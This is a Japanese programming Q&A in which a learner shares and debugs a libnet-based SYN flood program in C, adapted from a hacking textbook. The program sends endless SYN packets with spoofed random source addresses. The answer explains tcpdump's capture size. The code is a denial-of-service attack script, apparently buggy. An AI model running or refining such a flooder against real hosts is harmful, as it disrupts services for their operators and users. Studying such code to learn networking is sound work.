# libnetで作成したデータについて

Tags: c

「HACKING:美しき策謀」を参考にして、kali_linux上で、下記のようなsynfloodのコードを書いてみました。実行`sudo ./synflood x.x.x.x yy -lnet`してみたところ、うまく動いているようです。しかし、`sudo tcpdump -i eth0 -nl -c 5 "host x.x.x.x”`を実行したところ、以下のように返ってきます。以下のcapture sizeをみると、262144bytesとなっていますが、上記参考書では、96bytesとなっています。

下記コードのsynfloodは、どんなデータを送っているのでしょうか？また、この送るデータの修正方法はどうすればいいのでしょうか？

ちなみに、最初、`libnet_write_raw_ipv4()`を`libnet_write(l)`としていましたが、実行時に`@Erro libnet_write: libnet_write_raw_ipv4(): -1 bytes written (Message too long)`となります。

```
>>tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>>listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>>^C
>>0 packets captured
>>0 packets received by filter
>>0 packets dropped by kernel
```

```
#include <stdio.h>
#include <string.h>

#include <libnet.h>

#define FLOOD_DELAY 5000        //パケット注入の遅延時間は5000msである。


/* x.x.x.x形式のIPを返す*/
char *print_ip(uint32_t *ip_addr_ptr){
        return inet_ntoa(*((struct in_addr *)ip_addr_ptr));
}

int main(int argc,char *argv[]){
        uint32_t dest_ip,source;
        uint16_t dest_port;
        u_char errbuf[LIBNET_ERRBUF_SIZE], *pcap_errbuf, *packet;
        int network, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
        libnet_t *l;


        if(argc<3){
                printf("使用方法:\n%s\t ＜対象ホスト＞＜対象ポート＞\n",argv[0]);
                exit(1);
        }

        //printf("device name: %s\n",alldevsp->name);
        l = libnet_init(LIBNET_RAW4,NULL,errbuf);               //パケット酔うのメモリを割り当てる
        if(l == NULL){
                fprintf(stderr,"Error opening context: %s\n",errbuf);
                exit(1);
        }

        dest_ip = libnet_name2addr4(l,argv[1],LIBNET_DONT_RESOLVE);     //host
        dest_port = (u_short)atoi(argv[2]);                     //ポート


        if(libnet_seed_prand(l) == -1)                                  //乱数生成器に種を与える
                printf("Error libnet_seed_prand: %s\n",libnet_geterror(l));

        printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));

        libnet_ptag_t tag_ipv4 = 0;                             //libnet protocol block
        libnet_ptag_t tag_tcp = 0;                              //libnet protocol block

        while(1){                                               //永久ループ（CTRL-Cで終了されるまで）
                if(tag_tcp = libnet_build_tcp(libnet_get_prand(LIBNET_PRu16),  //送信元TCPポート（乱数化）
                        dest_port,                              //宛先TCPポート
                        libnet_get_prand(LIBNET_PRu32),         //シーケンス番号（乱数化）
                        libnet_get_prand(LIBNET_PRu32),         //確認応答（ACK)番号（乱数化）
                        TH_SYN,                                 //コントロールフラグ(SYNフラグのみ設定）
                        libnet_get_prand(LIBNET_PRu16),         //ウィンドウサイズ（乱数化）
                        0,                                      //checksum 0=autofill
                        0,                                      //至急ポインタ
                        LIBNET_TCP_H,                           //header length
                        NULL,                                   //ペイロード（なし）
                        0,                                      //ペイロード長
                        l,                                      //libnet context
                        0) == -1)                               //protocol tag
                        printf("Error building TCP header; %s\n",libnet_geterror(l));

                if(tag_ipv4 = libnet_build_ipv4(packet_size,            //IPヘッダを除いたパケットサイズ
                        IPTOS_LOWDELAY,                         //IP　tos
                        libnet_get_prand(LIBNET_PRu16),         //IP ID(乱数化)
                        0,                                      //断片化
                        libnet_get_prand(LIBNET_PR8),           //TTL（乱数化）
                        IPPROTO_TCP,                            //トランスポートプロトコル
                        0,                                      //checksum 0=autofill
                        libnet_get_prand(LIBNET_PRu32),         //送信元IP（乱数化９
                        dest_ip,                                //宛先IP
                        NULL,                                   //ペイロード（なし）
                        0,                                      //ペイロード長
                        l,                                      //libnet context
                        0) == -1)                               //protocol tag
                        printf("Error building IP header; %s\n",libnet_geterror(l));



                if(libnet_write_raw_ipv4(l,packet,40) == -1){
                        printf("@Erro libnet_write: %s\n",libnet_geterror(l));
                        exit(1);
                }

                usleep(FLOOD_DELAY);                            //FLOOD_DEPLAYミリ秒待機する
        }

        libnet_destroy(l);                              //パケットメモリを開放する


        return 0;
}
```

Comment: ipアドレスが到底ないようです。異なるipアドレスで、実行しても、tcpdumpでは、同じアドレス「76.137.233.137」が宛先アドレスとなっています。このアドレスは、一体何でしょうか？

Comment: ```@Erro libnet_write: libnet_write_raw_ipv4(): -1 bytes written (Message too long)```は、while文により、リブネットのコンテキストに多くのヘッダを作りすぎてしまったために発生したエラーでした。```linnet_write()```を使った方が良いようです。linnet_write_raw_ipv4()```の動作はみかくにんです。ちなみに、```linnet_init()```から```linnet_destroy()```までをwhile文の中に入れないと、コンテキストは上書きされないようなので、途中、エラーが発生します。

Answer (score 1, accepted):

出力メッセージ

```
>>listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
```

の「`262144`」は、`tcpdump`が1パケットとしてキャプチャできるサイズの上限を示しているので、(この場合)送信しているパケットサイズとは関係ありません。

＃ネットワークインターフェースのMTUより大きな値なので不思議に思うかも知れませんが、NICのTCPオフロード機能が有効な場合、分割前のパケットをキャプチャするため、最近の`tcpdump`はMTUより大きなサイズをキャプチャ上限としているようです。

---

なお、

```
>>0 packets captured
>>0 packets received by filter
>>0 packets dropped by kernel
```

とパケットがキャプチャされていない結果が出力されているのは、いくつかの原因が考えられます。

1. インターフェース(`eth0`)が異なる
2. フィルタ条件(`host x.x.x.x`)が異なる

フィルタ条件を外すなどして、切り分けていくとよいと思います。

Comment: 続きは、[「libnetのIPアドレスについて」](https://ja.stackoverflow.com/q/67153/19110)に示しています。